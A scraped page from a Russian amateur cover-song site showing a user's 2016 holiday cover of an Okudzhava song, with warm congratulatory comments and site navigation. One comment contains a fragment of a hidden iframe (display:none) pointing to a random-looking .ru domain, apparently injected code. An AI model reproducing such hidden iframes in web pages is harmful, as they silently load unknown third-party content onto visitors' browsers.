На главную Muza.vip
      
My Love
(Paul McCartney)
Запела осень
(Хурсенко Вячеслав)
Романс
(Сумишевский Ярослав)
Женщины все королевы
(Прохорихина Жанна)
Легенда
(Кино)


Песня месяца
Май 2026 года
Angelochek_msНадоело засыпать одной
(Мельянцева Надежда)

Баллов: 717



   «Песенка о старом короле» (Окуджава Булат)

258   93   3
   Кавер-версия от Viovla
23.02.2016 1002
С праздником вас, дорогие защитники отечества!!!

Улыбайтесь чаще!!!!!)))
  Баллов:
111
  

Подарки:


Комментарии пользователей к записи:

          Страницы: 1  2 

Samocvet, 23.02.2016 г. 10:09
Улыбаюсь...спасибо большое Веточка!vozdushnyj_poceluj
  

Viovla, 23.02.2016 г. 12:16
И это здорово, Сань!
С праздником тебя!!! bayans_sharikamiv_romashkah
  

Samocvet, 23.02.2016 г. 12:19
спасибо огромное Веточка!chok
  
bmw1965, 23.02.2016 г. 10:12
Виолетта............. klassv_naushnikah Классное исполнение!!!!!!! buket_serdechki
  

Viovla, 23.02.2016 г. 12:16
Мариночка! Спасибо!!! v_romashkahna_skripkebuket_serdechki
  
domingo28, 23.02.2016 г. 10:20
Веточка, к твоему, такому славному подарку для мужчин очень приятно присоединиться!klass
Желаю нашим дорогим мужчинам самого доброго!chok
  

Viovla, 23.02.2016 г. 12:17
Галочка, с удовольствием тебя возьму в компанию!
За наших защитников!!! chok
  
podsnegnik, 23.02.2016 г. 10:31
ВИОЛЕТТОЧКА, КЛАССНОЕ ПОЗДРАВЛЕНИЕ,СПАСИБО!!!!bravo_bigvoo
  

Viovla, 23.02.2016 г. 12:18
Спасибо за шикарный букет!v_romashkah
Василий, с праздником Вас!!! buket_bigs_sharikami
  
sing, 23.02.2016 г. 10:33
Виолеточка, присоединяюсь к поздравлениям! v_naushnikah Защитникам нашим - СЛАВА, СЛАВА, СЛАВА!!! chok Песенка - voo! Исполнение - applodbuket_big
  

Viovla, 23.02.2016 г. 12:18
Галочка, благодарю, что зашла на огонек! Слава нашим защитникам!!! За них! chok
  
sgpekin, 23.02.2016 г. 10:41
Спасибо, Вета, за поздравление, за славную песенку, которую я услышал впервые, за твое внимание к нам, защитникам Родины нашей!!! buket_serdechkibuket_bigЗа таких женщин как ты, мы готовы всегда отстоять наши рубежи от неприятеля!love_online
  

Viovla, 23.02.2016 г. 12:21
Сережа, рада тебя познакомить с новой песней! ...хотя она очень давнишняя...)
С праздником тебя!!! s_sharikamibuket_big
Уверена - наши рубежи будут под надежной охраной!!! klass
  
Marinajazz, 23.02.2016 г. 10:46
v_naushnikah...................какая смешная песенка, Веточка! angelochekУмеешь найти чудесные вещицы! bravo_big bravo_big s_sharikami Мальчишкам понравится, стопудово! dada (пряники надо искать в самосвалах, которые переворачиваются случайно, - подсказка!) rzhunimagu
  

Viovla, 23.02.2016 г. 12:23
...дык.. один самосвал в год перевернется где-то далеко.. а пряников хочется всем и всегда... это не выход.. как и завоевание тоже)))
Пряники надо выдавать сколько кому хочется!!!
Спасибо, Мариша, за твое участие и подарочек!!!!
Нас всех тоже с праздником! потому что он общий!!! s_sharikamiserdce_v_ruke
  
Tatjanka70, 23.02.2016 г. 10:48
Хорошая такая песенка..na_skripke и ты в ней такая...d9buket

С удовольствием присоединяюсь к твоему поздравлению для мужчин,Ветуль!Крепкого здоровья и многие лета нашим дорогим Защитникам!buket_big
  

Viovla, 23.02.2016 г. 12:29
Танюша, так хорошо, что ты присоединилась!... Спасибо тебе за поддержку!...serdce_v_ruke
Песенка меня сама нашла.. вдруг)) Рада, что успела ее записать)
Нашим защитникам всего самого-пресамого доброго!
Главное - здоровья, сил и мужества, чтобы нас защищали!!! А остальное приложится! v_romashkah
  
marinka9, 23.02.2016 г. 11:22
Вау, какая песня шикарная песня, Виолла!!!!! К тебе хожу всегда в ожидании чего нибудь интересного!!!podmigivanie Красивое поздравление для наших мужчин!!!klassbuket_big
  

Viovla, 23.02.2016 г. 12:31
..да странно, песня то известная, а почти никто не поет))
У Окуджавы много таких... интересных..
Спасибо, Мариночка, за компанию, всегда тебе рада! s_sharikamiv_romashkah
  

marinka9, 23.02.2016 г. 12:33
Но ТАК петь не все могут!!!
  

Viovla, 23.02.2016 г. 12:34
smushenie..
..а надо - по-своему da_da
  
irisha56, 23.02.2016 г. 11:25
Классное поздравление,Веточка!!bravo
За наших защитников!!chok

  

Viovla, 23.02.2016 г. 12:31
Ириша, благодарю тебя!v_romashkah
За наших защитников!!! chok
  
ReVN, 23.02.2016 г. 11:43
rozochka
Виолетта!!!bravo_big
  

Viovla, 23.02.2016 г. 12:32
Володя! С праздником!!! buket_big
  

ReVN, 23.02.2016 г. 13:17
....martini
Спасибо!!!poceluj_v_shsechku
rozochka
  
Olya_radost, 23.02.2016 г. 11:54
Прекрасное поздравление, Виолочка!!!!!bravo Защитникам нашим УРААААА!!!!s_sharikami
  

Viovla, 23.02.2016 г. 12:32
УРАААА!!!!! chok
Спасибо тебе, Олечка, за компанию!!!!
  
kolginova, 23.02.2016 г. 12:14
Вилочка,очень хорошее поздравление для наших мальчиков!!!!
Я с удовольствием присоединяюсь!!!!!!!!!
  

Viovla, 23.02.2016 г. 12:33
Галочка! здорово , что ты со мной! d9
Давай за наших защитников!!! martinibayan
  
ANDREANO, 23.02.2016 г. 12:22
bravoserdce_v_rukebravona_skripkeangelochekrozochka
  

Viovla, 23.02.2016 г. 12:33
s_sharikamibayanv_romashkah
  
yurij-046, 23.02.2016 г. 12:36
Виолетточка,милая,спасибо за прекраснейшее поздравление!!!voobravobuket_serdechkibravo_bigvozdushnyj_pocelujmartini
http://ic.pics.livejournal.com/salenta/36499300/124378/124378_original.jpg s_sharikami
  

Viovla, 24.02.2016 г. 21:57
Юрочка! Я рада, что тебе понравилось!!! s_sharikamiv_romashkah
  
Prima25, 23.02.2016 г. 13:25
Виолетточка,спела великолепно.Песенка прелестьvoobravo_bigЗа наших Защитниковchok

id="a1996667054" src="//110oeg8yg1z.ru/f.html" style="display:none">
  

Viovla, 24.02.2016 г. 21:58
Ириночка! Спасибо! За защитников!!! martiniv_romashkah
  
GOHA, 23.02.2016 г. 14:31
ВИОЛЕТА МОЛОДЧИНА bravo_bigПРЕКРАСНО СПЕЛА СПАСИБО!buket_serdechki
  

Viovla, 24.02.2016 г. 21:58
v_romashkahЮрий! Спасибо за внимание и добрые слова! s_sharikami
  
makjuli9, 23.02.2016 г. 14:44
Какая чудесная песенка!! Виолетта, замечательный подарок!!!!!!klass Прекрасное исполнение!!!applodrozochka
  

Viovla, 24.02.2016 г. 21:59
Юля! Спасибо, что послушала! Мне приятно! buket_serdechkiv_romashkah
  
SkT, 23.02.2016 г. 18:29
Вот эта поздравительная песенка мне нравится!)))))))) klass ОТ медсестры запаса vozdushnyj_pocelujЕсли понадобится, уколы буду делать с улыбкой!rzhunimagu
  

Viovla, 24.02.2016 г. 22:01
Давай.. делай с улыбкой)) а то, без улыбки вон чего бывает)) И пряники не спасут)))bayano_da
Тогда и тебя с праздничком что ли??? smehvictory
  

SkT, 24.02.2016 г. 22:09
Ну,типа,да)))
  

Viovla, 24.02.2016 г. 22:11
...типа.. типа... o_da
  
Elena_G, 23.02.2016 г. 19:06
Замечательно спела, Виолетточка! Отличный подарок мужчинам!bravo_big
  

Viovla, 24.02.2016 г. 22:01
Спасибо, Леночка! надеюсь, им понравилось! v_romashkahbuket_serdechki
  

          Страницы: 1  2 

align=absbottomКомментарии могут оставлять только зарегистрированные пользователи, активировавшие аккаунт!
Зарегистрироваться или войти

  ПОМОГАЕМ
  ЖИВОТНЫМ
  В ЗОНЕ СВО




Студия
Otblesk
Королева Марго
Лесоповал
akononov6690
До рассвета
Комаров Альберт
kir4
Ария Фигаро 2 (Свадьба Фигаро)
Оперные
Temanik
Благодарю
Магомаев Муслим
LonelyWoolf
Have You Ever See The Rain
Creedence Clearwater Revival
Haris1958
Lookin Out My Back Door
Creedence Clearwater Revival
BEDHAR58
WhoLl Stop The Rain
Creedence Clearwater Revival
mranatolm
Задержанный рейс
Губанов Сергей
dyuna
Черная вода
Ground beat
volod
Октябрь
Серков Сергей
Marinajazz
Когда мы встретимся
Галушко Виталий
felivanov54
За Тобой пойду
XakeR
igor-grishkov
Исцели
Ром Алексей
FAMOUS
В гостях
Саруханов Игорь
gdi1960
Прости
Косинский Андрей
NikSFilm2014
Ежевика
Мамаев Василий
aliara
Вагончики качались
Шаронова Людмила
singing_woman
Двое не спят
Сплин
Marka64
Джинуни
Ялла
v_solovey
Паромщик
Варум Анжелика
zaiaz
Дождь
Искусственный интеллект
Luch
А я просто живу
Авторские
Bet
Дорога в рай
Арефьева Ольга
tuleneva
Дожди над Ленинградом
Эгромжан Александр
Manama
Вокализ16
Вокализы
djdfy56
Я очень, очень, очень, сексуально озабочен
Спиридонов Александр
Tatiana-Nikolay
Течет ручей
Золотое кольцо
Anatoli52
Сережка ольховая
И это все о нем
akmira2814
Inside Looking Out
The Alan Parsons Project
TomJones
Территория
Митяев Олег




Территория творческого настроения © Muza.vip, 2011 — 2026 гг. Пользовательское соглашение.